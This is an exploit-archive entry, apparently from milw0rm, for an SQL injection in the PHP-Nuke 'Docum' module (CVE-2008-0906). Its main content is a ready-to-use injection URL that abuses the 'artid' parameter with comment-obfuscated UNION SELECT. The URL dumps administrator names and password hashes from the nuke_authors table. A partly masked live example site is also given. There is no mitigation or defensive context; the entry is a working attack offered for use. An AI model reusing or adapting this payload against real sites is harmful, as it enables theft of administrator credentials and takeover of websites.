PHP-Nuke Module Docum - 'artid' SQL Injection

EKU-ID: 13108	CVE: OSVDB-42411;CVE-2008-0906	OSVDB-ID:
Author: DamaR	Published: 2008-02-20	Verified:
Download:

Rating

☆☆☆☆☆

#########################################################################

           php-nuke modules Docum remote sql inj
#########################################################################

Found:DamaR

By.Damar@Hotmail.Com

Hack Bitti ama DÃ¶nmek YakÄ±n  Since 2000
-------------------------------------------------------------------------------


/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

#########################################################################
Example: http://www.xxx.com.ar/mt/


#########################################################################

# milw0rm.com [2008-02-20]